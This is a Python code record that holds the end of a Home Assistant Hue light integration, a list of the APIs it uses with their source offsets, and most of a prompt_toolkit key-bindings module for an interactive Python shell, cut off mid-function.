self.gamut = None
else:
self.is_osram = light.manufacturername == "OSRAM"
self.is_philips = light.manufacturername == "Philips"
self.is_innr = light.manufacturername == "innr"
self.is_ewelink = light.manufacturername == "eWeLink"
self.is_livarno = light.manufacturername.startswith("_TZ3000_")
self.gamut_typ = self.light.colorgamuttype
self.gamut = self.light.colorgamut
_LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut))
if self.light.swupdatestate == "readytoinstall":
err = (
"Please check for software updates of the %s "
"bulb in the Philips Hue App."
)
_LOGGER.warning(err, self.name)
if self.gamut and not color.check_valid_gamut(self.gamut):
err = "Color gamut of %s: %s, not valid, setting gamut to None."
_LOGGER.debug(err, self.name, str(self.gamut))
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
@property
def unique_id(self):
"""Return the unique ID of this Hue light."""
unique_id = self.light.uniqueid
if not unique_id and self.is_group and self.light.room:
unique_id = self.light.room["id"]
return unique_id
@property
def device_id(self):
"""Return the ID of this Hue light."""
return self.unique_id
@property
def name(self):
"""Return the name of the Hue light."""
return self.light.name
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self.is_group:
bri = self.light.action.get("bri")
else:
bri = self.light.state.get("bri")
if bri is None:
return bri
return hue_brightness_to_hass(bri)
@property
def _color_mode(self):
"""Return the hue color mode."""
if self.is_group:
return self.light.action.get("colormode")
return self.light.state.get("colormode")
@property
def hs_color(self):
"""Return the hs color value."""
mode = self._color_mode
source = self.light.action if self.is_group else self.light.state
if mode in ("xy", "hs") and "xy" in source:
return color.color_xy_to_hs(*source["xy"], self.gamut)
return None
@property
def color_temp(self):
"""Return the CT color value."""
# Don't return color temperature unless in color temperature mode
if self._color_mode != "ct":
return None
if self.is_group:
return self.light.action.get("ct")
return self.light.state.get("ct")
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
if self.is_group:
return super().min_mireds
min_mireds = self.light.controlcapabilities.get("ct", {}).get("min")
        # We filter out '0' too, which can be incorrectly reported by 3rd party bulbs
if not min_mireds:
return super().min_mireds
return min_mireds
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
if self.is_group:
return super().max_mireds
if self.is_livarno:
return 500
max_mireds = self.light.controlcapabilities.get("ct", {}).get("max")
if not max_mireds:
return super().max_mireds
return max_mireds
@property
def is_on(self):
"""Return true if device is on."""
if self.is_group:
return self.light.state["any_on"]
return self.light.state["on"]
@property
def available(self):
"""Return if light is available."""
return self.coordinator.last_update_success and (
self.is_group
or self.bridge.allow_unreachable
or self.light.state["reachable"]
)
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def effect(self):
"""Return the current effect."""
return self.light.state.get("effect", None)
@property
def effect_list(self):
"""Return the list of supported effects."""
if self.is_osram:
return [EFFECT_RANDOM]
return [EFFECT_COLORLOOP, EFFECT_RANDOM]
@property
def device_info(self) -> DeviceInfo | None:
"""Return the device info."""
if self.light.type in (
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_ROOM,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_LIGHT_SOURCE,
):
return None
suggested_area = None
if self.light.id in self._rooms:
suggested_area = self._rooms[self.light.id]
return DeviceInfo(
identifiers={(HUE_DOMAIN, self.device_id)},
manufacturer=self.light.manufacturername,
# productname added in Hue Bridge API 1.24
# (published 03/05/2018)
model=self.light.productname or self.light.modelid,
name=self.name,
# Not yet exposed as properties in aiohue
suggested_area=suggested_area,
sw_version=self.light.raw["swversion"],
via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid),
)
async def async_added_to_hass(self) -> None:
"""Handle entity being added to Home Assistant."""
self.async_on_remove(
self.bridge.listen_updates(
self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state
)
)
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn the specified or all lights on."""
command = {"on": True}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
if ATTR_HS_COLOR in kwargs:
if self.is_osram:
command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535)
command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255)
else:
# Philips hue bulb models respond differently to hue/sat
# requests, so we convert to XY first to ensure a consistent
# color.
xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut)
command["xy"] = xy_color
elif ATTR_COLOR_TEMP in kwargs:
temp = kwargs[ATTR_COLOR_TEMP]
command["ct"] = max(self.min_mireds, min(temp, self.max_mireds))
if ATTR_BRIGHTNESS in kwargs:
command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS])
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_ewelink and not self.is_livarno:
command["alert"] = "none"
if ATTR_EFFECT in kwargs:
effect = kwargs[ATTR_EFFECT]
if effect == EFFECT_COLORLOOP:
command["effect"] = "colorloop"
elif effect == EFFECT_RANDOM:
command["hue"] = random.randrange(0, 65535)
command["sat"] = random.randrange(150, 254)
else:
command["effect"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
async def async_turn_off(self, **kwargs):
"""Turn the specified or all lights off."""
command = {"on": False}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_livarno:
command["alert"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
if not self.is_group:
return {}
return {ATTR_IS_HUE_GROUP: self.is_group}
| [
"logging.getLogger",
"homeassistant.helpers.debounce.Debouncer",
"random.randrange",
"homeassistant.helpers.entity.DeviceInfo",
"async_timeout.timeout",
"homeassistant.util.color.color_xy_to_hs",
"functools.partial",
"homeassistant.helpers.update_coordinator.UpdateFailed",
"datetime.timedelta",
"homeassistant.util.color.check_valid_gamut",
"homeassistant.util.color.color_hs_to_xy"
] | [((1183, 1203), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(5)'}), '(seconds=5)\n', (1192, 1203), False, 'from datetime import timedelta\n'), ((1215, 1242), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1232, 1242), False, 'import logging\n'), ((6930, 7002), 'functools.partial', 'partial', (['create_light', 'HueLight', 'light_coordinator', 'bridge', '(False)', 'rooms'], {}), '(create_light, HueLight, light_coordinator, bridge, False, rooms)\n', (6937, 7002), False, 'from functools import partial\n'), ((14302, 14615), 'homeassistant.helpers.entity.DeviceInfo', 'DeviceInfo', ([], {'identifiers': '{(HUE_DOMAIN, self.device_id)}', 'manufacturer': 'self.light.manufacturername', 'model': '(self.light.productname or self.light.modelid)', 'name': 'self.name', 'suggested_area': 'suggested_area', 'sw_version': "self.light.raw['swversion']", 'via_device': '(HUE_DOMAIN, self.bridge.api.config.bridgeid)'}), "(identifiers={(HUE_DOMAIN, self.device_id)}, manufacturer=self.\n light.manufacturername, model=self.light.productname or self.light.\n modelid, name=self.name, suggested_area=suggested_area, sw_version=self\n .light.raw['swversion'], via_device=(HUE_DOMAIN, self.bridge.api.config\n .bridgeid))\n", (14312, 14615), False, 'from homeassistant.helpers.entity import DeviceInfo\n'), ((3717, 3776), 'functools.partial', 'partial', (['async_safe_fetch', 'bridge', 'bridge.api.lights.update'], {}), '(async_safe_fetch, bridge, bridge.api.lights.update)\n', (3724, 3776), False, 'from functools import partial\n'), ((3851, 3930), 'homeassistant.helpers.debounce.Debouncer', 'Debouncer', (['bridge.hass', '_LOGGER'], {'cooldown': 'REQUEST_REFRESH_DELAY', 'immediate': '(True)'}), '(bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True)\n', (3860, 3930), False, 'from homeassistant.helpers.debounce import Debouncer\n'), ((4414, 4486), 'functools.partial', 'partial', (['create_light', 'HueLight', 'light_coordinator', 'bridge', '(False)', 'rooms'], {}), '(create_light, HueLight, light_coordinator, bridge, False, rooms)\n', (4421, 4486), False, 'from functools import partial\n'), ((4866, 4925), 'functools.partial', 'partial', (['async_safe_fetch', 'bridge', 'bridge.api.groups.update'], {}), '(async_safe_fetch, bridge, bridge.api.groups.update)\n', (4873, 4925), False, 'from functools import partial\n'), ((5000, 5079), 'homeassistant.helpers.debounce.Debouncer', 'Debouncer', (['bridge.hass', '_LOGGER'], {'cooldown': 'REQUEST_REFRESH_DELAY', 'immediate': '(True)'}), '(bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True)\n', (5009, 5079), False, 'from homeassistant.helpers.debounce import Debouncer\n'), ((5307, 5377), 'functools.partial', 'partial', (['create_light', 'HueLight', 'group_coordinator', 'bridge', '(True)', 'None'], {}), '(create_light, HueLight, group_coordinator, bridge, True, None)\n', (5314, 5377), False, 'from functools import partial\n'), ((7376, 7400), 'async_timeout.timeout', 'async_timeout.timeout', (['(4)'], {}), '(4)\n', (7397, 7400), False, 'import async_timeout\n'), ((7569, 7597), 'homeassistant.helpers.update_coordinator.UpdateFailed', 'UpdateFailed', (['"""Unauthorized"""'], {}), "('Unauthorized')\n", (7581, 7597), False, 'from homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator, UpdateFailed\n'), ((7663, 7696), 'homeassistant.helpers.update_coordinator.UpdateFailed', 'UpdateFailed', (['f"""Hue error: {err}"""'], {}), "(f'Hue error: {err}')\n", (7675, 7696), False, 'from 
homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator, UpdateFailed\n'), ((11705, 11752), 'homeassistant.util.color.color_xy_to_hs', 'color.color_xy_to_hs', (["*source['xy']", 'self.gamut'], {}), "(*source['xy'], self.gamut)\n", (11725, 11752), False, 'from homeassistant.util import color\n'), ((15843, 15899), 'homeassistant.util.color.color_hs_to_xy', 'color.color_hs_to_xy', (['*kwargs[ATTR_HS_COLOR]', 'self.gamut'], {}), '(*kwargs[ATTR_HS_COLOR], self.gamut)\n', (15863, 15899), False, 'from homeassistant.util import color\n'), ((10131, 10166), 'homeassistant.util.color.check_valid_gamut', 'color.check_valid_gamut', (['self.gamut'], {}), '(self.gamut)\n', (10154, 10166), False, 'from homeassistant.util import color\n'), ((16825, 16851), 'random.randrange', 'random.randrange', (['(0)', '(65535)'], {}), '(0, 65535)\n', (16841, 16851), False, 'import random\n'), ((16885, 16911), 'random.randrange', 'random.randrange', (['(150)', '(254)'], {}), '(150, 254)\n', (16901, 16911), False, 'import random\n'), ((17066, 17107), 'functools.partial', 'partial', (['self.light.set_action'], {}), '(self.light.set_action, **command)\n', (17073, 17107), False, 'from functools import partial\n'), ((17202, 17242), 'functools.partial', 'partial', (['self.light.set_state'], {}), '(self.light.set_state, **command)\n', (17209, 17242), False, 'from functools import partial\n'), ((17992, 18033), 'functools.partial', 'partial', (['self.light.set_action'], {}), '(self.light.set_action, **command)\n', (17999, 18033), False, 'from functools import partial\n'), ((18128, 18168), 'functools.partial', 'partial', (['self.light.set_state'], {}), '(self.light.set_state, **command)\n', (18135, 18168), False, 'from functools import partial\n')] |
from prompt_toolkit.key_binding.bindings.named_commands import (accept_line,
self_insert, backward_delete_char, beginning_of_line)
from prompt_toolkit.key_binding.bindings.basic import if_no_repeat
from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings
from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings
from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings
from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings
from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings
from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings
from prompt_toolkit.keys import Keys, ALL_KEYS
from prompt_toolkit.filters import Condition, HasSelection, is_searching
from prompt_toolkit.selection import SelectionState
from prompt_toolkit.clipboard import ClipboardData
from prompt_toolkit.input.vt100_parser import ANSI_SEQUENCES
from prompt_toolkit.application.current import get_app
from prompt_toolkit.application import run_in_terminal
from prompt_toolkit import __version__ as prompt_toolkit_version
from .multiline import (auto_newline, tab_should_insert_whitespace,
document_is_multiline_python)
from .tokenize import inside_string, matching_parens
from .theme import emoji, emoji_pudb
from .processors import get_pyflakes_warnings
import re
import subprocess
import sys
import textwrap
import platform
def get_key_bindings():
# Based on prompt_toolkit.key_binding.defaults.load_key_bindings()
return merge_key_bindings([
load_basic_bindings(),
load_emacs_bindings(),
load_emacs_search_bindings(),
load_emacs_page_navigation_bindings(),
load_mouse_bindings(),
load_cpr_bindings(),
custom_key_bindings,
])
r = custom_key_bindings = KeyBindings()
def warning_positions(event):
document = event.current_buffer.document
warnings = get_pyflakes_warnings(document.text, frozenset(event.current_buffer.session._locals))
positions = []
for (row, col, msg, m) in warnings:
# Handle SyntaxErrorMessage which is the same warning for the whole
# line.
if m.col != col:
continue
pos = document.translate_row_col_to_index(row, col)
positions.append(pos)
return positions
@r.add_binding(Keys.Escape, 'p')
def previous_warning(event):
positions = warning_positions(event)
buffer = event.current_buffer
buffer._show_syntax_warning = True
if not positions or positions[0] >= buffer.cursor_position:
return
p = positions[0]
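    # Jump to the last warning position that is still before the cursor.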
for pos in positions:
if pos >= buffer.cursor_position:
break
p = pos
event.current_buffer._show_syntax_warning = True
event.current_buffer.cursor_position = p
@r.add_binding(Keys.Escape, 'n')
def next_warning(event):
positions = warning_positions(event)
buffer = event.current_buffer
buffer._show_syntax_warning = True
if not positions or positions[-1] <= buffer.cursor_position:
return
p = positions[-1]
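    # Jump to the first warning position after the cursor.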
for pos in reversed(positions):
if pos <= buffer.cursor_position:
break
p = pos
event.current_buffer.cursor_position = p
# This can be removed once
# https://github.com/prompt-toolkit/python-prompt-toolkit/pull/857 is in a
# released version of prompt-toolkit.
ANSI_SEQUENCES['\x1b[1;9A'] = (Keys.Escape, Keys.Up)
ANSI_SEQUENCES['\x1b[1;9B'] = (Keys.Escape, Keys.Down)
@r.add_binding(Keys.Escape, Keys.Up)
def previous_history_search(event):
event.key_sequence[-1].accept_next = True
buffer = event.current_buffer
buffer.history_backward(count=event.arg, history_search=True)
@r.add_binding(Keys.Escape, 'P')
@r.add_binding(Keys.Escape, Keys.Down)
def forward_history_search(event):
event.key_sequence[-1].accept_next = True
buffer = event.current_buffer
buffer.history_forward(count=event.arg, history_search=True)
@r.add_binding(Keys.Escape, '<')
def beginning(event):
"""
Move to the beginning
"""
event.current_buffer.cursor_position = 0
@r.add_binding(Keys.Escape, '>')
def end(event):
"""
Move to the end
"""
event.current_buffer.cursor_position = len(event.current_buffer.text)
# Document.start_of_paragraph/end_of_paragraph don't treat multiple blank
# lines correctly.
# Gives the positions right before one or more blank lines
BLANK_LINES = re.compile(r'\S *(\n *\n)')
@r.add_binding(Keys.Escape, '}')
def forward_paragraph(event):
"""
Move forward one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in BLANK_LINES.finditer(text):
if m.start(0) > cursor_position:
event.current_buffer.cursor_position = m.start(1)+1
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, '{')
def backward_paragraph(event):
"""
Move back one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in BLANK_LINES.finditer(text[::-1]):
if m.start(0) > len(text) - cursor_position:
event.current_buffer.cursor_position = len(text) - m.end(1) + 1
return
event.current_buffer.cursor_position = 0
WORD = re.compile(r'([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)')
@r.add_binding(Keys.Escape, 'f')
@r.add_binding(Keys.Escape, Keys.Right)
def forward_word(event):
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
if m.end(0) > cursor_position:
event.current_buffer.cursor_position = m.end(0)
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'b')
@r.add_binding(Keys.Escape, Keys.Left)
def backward_word(event):
"""
    Move back one word
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in reversed(list(WORD.finditer(text))):
if m.start(0) < cursor_position:
event.current_buffer.cursor_position = m.start(0)
return
event.current_buffer.cursor_position = 0
@r.add_binding(Keys.Escape, 'd')
def kill_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = buffer.cursor_position
pos = None
for m in WORD.finditer(text):
if m.end(0) > cursor_position:
pos = m.end(0) - cursor_position
break
if pos:
deleted = buffer.delete(count=pos)
event.app.clipboard.set_text(deleted)
@r.add_binding(Keys.Escape, Keys.Backspace)
def backward_kill_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = buffer.cursor_position
for m in reversed(list(WORD.finditer(text))):
if m.start(0) < cursor_position:
pos = cursor_position - m.start(0)
break
else:
pos = buffer.cursor_position
if pos:
deleted = buffer.delete_before_cursor(count=pos)
event.app.clipboard.set_text(deleted)
def insert_text_overwrite(buffer, data, move_cursor=True):
    """
    Insert characters at the cursor position, overwriting existing text
    instead of shifting it to the right.
    """
# Original text & cursor position.
otext = buffer.text
ocpos = buffer.cursor_position
# Don't overwrite the newline itself. Just before the line ending,
# it should act like insert mode.
overwritten_text = otext[ocpos:ocpos + len(data)]
buffer.text = otext[:ocpos] + data + otext[ocpos + len(overwritten_text):]
if move_cursor:
buffer.cursor_position += len(data)
@r.add_binding(Keys.Escape, 'l')
def downcase_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
            insert_text_overwrite(buffer, word.lower())
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'u')
def upcase_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
            insert_text_overwrite(buffer, word.upper())
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'c')
def capitalize_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
# Don't use word.capitalize() because the first character could be
# - or _
for i, c in enumerate(word):
if c.isalnum():
word = word[:i] + c.capitalize() + word[i+1:].lower()
break
            insert_text_overwrite(buffer, word)
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, Keys.ControlF)
def forward_sexp(event):
buffer = event.current_buffer
document = buffer.document
text = buffer.text
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
matching, mismatching = matching_parens(text)
for opening, closing in matching:
if opening.start == (row, col):
new_pos = document.translate_row_col_to_index(closing.end[0]-1, closing.end[1])
buffer.cursor_position = new_pos
return
event.app.output.bell()
@r.add_binding(Keys.Escape, Keys.ControlB)
def backward_sexp(event):
buffer = event.current_buffer
document = buffer.document
text = buffer.text
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
matching, mismatching = matching_parens(text)
for opening, closing in matching:
if closing.end == (row, col):
new_pos = document.translate_row_col_to_index(opening.start[0]-1, opening.start[1])
buffer.cursor_position = new_pos
return
event.app.output.bell()
@r.add_binding(Keys.Left)
def left_multiline(event):
"""
Left that wraps around in multiline.
"""
if event.current_buffer.cursor_position - event.arg >= 0:
event.current_buffer.cursor_position -= event.arg
if getattr(event.current_buffer.selection_state, "shift_arrow", False):
event.current_buffer.selection_state = None
@r.add_binding(Keys.Right)
def right_multiline(event):
"""
Right that wraps around in multiline.
"""
if event.current_buffer.cursor_position + event.arg <= len(event.current_buffer.text):
event.current_buffer.cursor_position += event.arg
if getattr(event.current_buffer.selection_state, "shift_arrow", False):
event.current_buffer.selection_state = None
@r.add_binding(Keys.ControlD)
def exit(event):
event.app.exit(exception=EOFError, style='class:exiting')
@r.add_binding(Keys.ControlC, filter=~is_searching)
def keyboard_interrupt(event):
event.app.exit(exception=KeyboardInterrupt, style='class:aborting')
is_returnable = Condition(
lambda: get_app().current_buffer.is_returnable)
@r.add_binding(Keys.Enter, filter=is_returnable)
def multiline_enter(event):
"""
When not in multiline, execute. When in multiline, try to
intelligently add a newline or execute.
"""
buffer = event.current_buffer
document = buffer.document
multiline = document_is_multiline_python(document)
text_after_cursor = document.text_after_cursor
text_before_cursor = document.text_before_cursor
text = buffer.text
# isspace doesn't respect vacuous truth
if (not text_after_cursor or text_after_cursor.isspace()) and text_before_cursor.replace(' ', '').endswith('\n'):
# If we are at the end of the buffer, accept unless we are in a
# docstring
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
if multiline and inside_string(text, row, col):
# We are inside a docstring
auto_newline(event.current_buffer)
else:
accept_line(event)
elif not multiline:
# Always accept a single valid line. Also occurs for unclosed single
# quoted strings (which will give a syntax error)
accept_line(event)
else:
auto_newline(event.current_buffer)
# Always accept the line if the previous key was Up
# Requires https://github.com/jonathanslenders/python-prompt-toolkit/pull/492.
# We don't need a parallel for down because down is already at the end of the
# prompt.
@r.add_binding(Keys.Enter, filter=is_returnable)
def accept_after_history_backward(event):
pks = event.previous_key_sequence
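    # Accept only when the previous key sequence was a history search
    # movement (Up, or Escape followed by p/P/up/down).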
if pks and getattr(pks[-1], 'accept_next', False) and ((len(pks) == 1 and
pks[0].key == "up") or (len(pks) == 2 and pks[0].key == "escape"
and isinstance(pks[1].key, str) and pks[1].key in ['p', 'P', 'up',
'down'])):
accept_line(event)
else:
multiline_enter(event)
@r.add_binding(Keys.Escape, Keys.Enter)
@r.add_binding(Keys.Escape, Keys.ControlJ)
def insert_newline(event):
auto_newline(event.current_buffer)
@r.add_binding(Keys.ControlO)
def open_line(event):
event.current_buffer.newline(copy_margin=False)
event.current_buffer.cursor_left()
# M-[ a g is set to S-Enter in iTerm2 settings
Keys.ShiftEnter = "<Shift-Enter>"
ALL_KEYS.append('<Shift-Enter>')
ANSI_SEQUENCES['\x1b[ag'] = Keys.ShiftEnter
ANSI_SEQUENCES['\x1bOM'] = Keys.ShiftEnter
if prompt_toolkit_version[0] != '3':
r.add_binding(Keys.ShiftEnter)(accept_line)
@r.add_binding(Keys.Tab, filter=tab_should_insert_whitespace)
def indent(event):
"""
When tab should insert whitespace, do that instead of completion.
"""
# Text before cursor on the line must be whitespace because of the
# TabShouldInsertWhitespaceFilter.
before_cursor = event.app.current_buffer.document.current_line_before_cursor
event.app.current_buffer.insert_text(' '*(4 - len(before_cursor)%4))
LEADING_WHITESPACE = re.compile(r'( *)[^ ]?')
@r.add_binding(Keys.Escape, 'm')
def back_to_indentation(event):
"""
Move back to the beginning of the line, ignoring whitespace.
"""
current_line = event.app.current_buffer.document.current_line
before_cursor = event.app.current_buffer.document.current_line_before_cursor
indent = LEADING_WHITESPACE.search(current_line)
if indent:
event.app.current_buffer.cursor_position -= len(before_cursor) - indent.end(1)
@r.add_binding(Keys.Backspace, save_before=if_no_repeat)
def delete_char_or_unindent(event):
buffer = event.app.current_buffer
if buffer.document.current_line_before_cursor.isspace():
spaces = len(buffer.document.current_line_before_cursor)
# Delete up to the tab stop
buffer.delete_before_cursor(count=4 + spaces%-4)
else:
backward_delete_char(event)
# Reset the history search text
buffer.history_search_text = None
@r.add_binding(Keys.Escape, ' ')
def cycle_spacing(event):
"""
Based on emacs's cycle-spacing
On first call, remove all whitespace (if any) from around the cursor and
replace it with a single space.
On second call, remove all whitespace.
On third call, restore the original whitespace and cursor position.
"""
buffer = event.app.current_buffer
    # Stash the cursor position and reset it so it cannot end up out of
    # sync while the text below grows or shrinks.
cursor_position = buffer.cursor_position
buffer.cursor_position = 0
buffer.text, buffer.cursor_position = do_cycle_spacing(buffer.text, cursor_position)
def do_cycle_spacing(text, cursor_position, state=[]):
rstripped = text[:cursor_position].rstrip()
lstripped = text[cursor_position:].lstrip()
text_before_cursor = text[:cursor_position]
# The first element of state is the original text. The last element is the
# buffer text and cursor position as we last left them. If either of those
# have changed, reset. The state here is global, but that's fine, because
# we consider any change to be enough clear the state. The worst that
# happens here is that we resume when we shouldn't if things look exactly
# as they did where we left off.
# TODO: Use event.previous_key_sequence instead.
if state and state[-1] != (text, cursor_position):
state.clear()
if len(state) == 0:
# Replace all whitespace at the cursor (if any) with a single space.
state.append((text, cursor_position))
cursor_position -= len(text_before_cursor) - len(rstripped) -1
text = rstripped + ' ' + lstripped
state.append((text, cursor_position))
elif len(state) == 2:
# Exactly one space at the cursor. Remove it.
cursor_position -= 1
text = rstripped + lstripped
state.append((text, cursor_position))
elif len(state) == 3:
# Restore original text and cursor position
text, cursor_position = state[0]
state.clear()
if cursor_position < 0:
cursor_position = 0
if cursor_position > len(text):
cursor_position = len(text)
return text, cursor_position
@r.add_binding(Keys.ControlX, Keys.ControlO)
def delete_blank_lines(event):
"""
On blank line, delete all surrounding blank lines, leaving just one.
On isolated blank line, delete that one.
On nonblank line, delete any immediately following blank lines.
"""
buffer = event.app.current_buffer
document = buffer.document
lines_up_to_current = document.lines[:document.cursor_position_row+1]
lines_after_current = document.lines[document.cursor_position_row+1:]
blank_lines_before = 0
for line in lines_up_to_current[::-1]:
if not line.strip():
blank_lines_before += 1
else:
break
blank_lines_after = 0
for line in lines_after_current:
if not line.strip():
blank_lines_after += 1
else:
break
if not blank_lines_before:
stripped_before = lines_up_to_current
else:
stripped_before = lines_up_to_current[:-blank_lines_before]
stripped_after = lines_after_current[blank_lines_after:]
# XXX: Emacs always keeps a newline at the end of the file, but I don't
# think it matters here.
if (not blank_lines_before and blank_lines_after) or blank_lines_before + blank_lines_after == 1:
new_text = '\n'.join(stripped_before + stripped_after)
elif blank_lines_before + blank_lines_after == 0:
return
else:
buffer.cursor_up(max(blank_lines_before-1, 0))
new_text = '\n'.join(stripped_before + [''] + stripped_after)
# Even though we do auto_up, it can be out of bounds from trailing
# whitespace
buffer.cursor_position = min(buffer.cursor_position, len(new_text))
buffer.text = new_text
@r.add_binding(Keys.ControlX, Keys.ControlT)
def transpose_lines(event):
buffer = event.current_buffer
document = buffer.document
row = document.cursor_position_row
new_lines = document.lines[:]
if len(new_lines) == 1:
new_lines.append('')
if row == 0:
buffer.cursor_down()
row += 1
if row == len(new_lines) - 1:
new_lines.append('')
new_lines[row], new_lines[row-1] = new_lines[row-1], new_lines[row]
buffer.text = '\n'.join(new_lines)
buffer.cursor_down()
beginning_of_line(event)
# Selection stuff
@r.add_binding(Keys.ShiftLeft)
def select_left(event):
buffer = event.current_buffer
if buffer.document.text_before_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
buffer.cursor_position -= event.arg
@r.add_binding(Keys.ShiftRight)
def select_right(event):
buffer = event.current_buffer
if buffer.document.text_after_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
buffer.cursor_position += event.arg
@r.add_binding(Keys.Up)
def auto_up(event):
buffer = event.current_buffer
count = event.arg
if buffer.document.cursor_position_row > 0:
buffer.cursor_up(count=count)
elif not buffer.selection_state:
event.key_sequence[-1].accept_next = True
buffer.history_backward(count=count)
if getattr(buffer.selection_state, "shift_arrow", False):
buffer.selection_state = None
@r.add_binding(Keys.Down)
def auto_down(event):
buffer = event.current_buffer
count = event.arg
if buffer.document.cursor_position_row < buffer.document.line_count - 1:
buffer.cursor_down(count=count)
elif not buffer.selection_state:
buffer.history_forward(count=count)
if getattr(buffer.selection_state, "shift_arrow", False):
buffer.selection_state = None
@r.add_binding(Keys.ShiftUp)
def select_line_up(event):
buffer = event.current_buffer
if buffer.document.text_before_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
up_position = buffer.document.get_cursor_up_position()
buffer.cursor_position += up_position
if not up_position:
buffer.cursor_position = 0
@r.add_binding(Keys.ShiftDown)
def select_line_down(event):
buffer = event.current_buffer
if buffer.document.text_after_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
down_position = buffer.document.get_cursor_down_position()
buffer.cursor_position += down_position
if not down_position:
buffer.cursor_position = len(buffer.document.text)
# The default doesn't toggle correctly
@r.add_binding(Keys.ControlSpace)
def toggle_selection(event):
buffer = event.current_buffer
if buffer.selection_state:
buffer.selection_state = None
else:
buffer.start_selection()
@r.add_binding(Keys.ControlX, 'h')
def select_all(event):
buffer = event.current_buffer
buffer.selection_state = SelectionState(len(buffer.document.text))
buffer.cursor_position = 0
@r.add_binding(Keys.Delete, filter=HasSelection())
@r.add_binding(Keys.Backspace, filter=HasSelection())
def delete_selection(event):
event.current_buffer.cut_selection()
@r.add_binding(Keys.Any, filter=HasSelection())
def self_insert_and_clear_selection(event):
event.current_buffer.cut_selection()
self_insert(event)
@r.add_binding(Keys.ControlK, filter=HasSelection())
@r.add_binding(Keys.ControlU, filter=HasSelection())
def kill_selection(event):
data = event.current_buffer.cut_selection()
event.app.clipboard.set_data(data)
def system_copy(text):
if "Linux" in platform.platform():
copy_command = ['xclip', '-selection', 'c']
else:
copy_command = ['pbcopy']
try:
# In Python 3.6 we can do this:
# run(copy_command, input=text, encoding='utf-8', check=True)
subprocess.run(copy_command, input=text.encode('utf-8'), check=True)
except FileNotFoundError:
print("Error: could not find", copy_command[0], file=sys.stderr)
except subprocess.CalledProcessError as e:
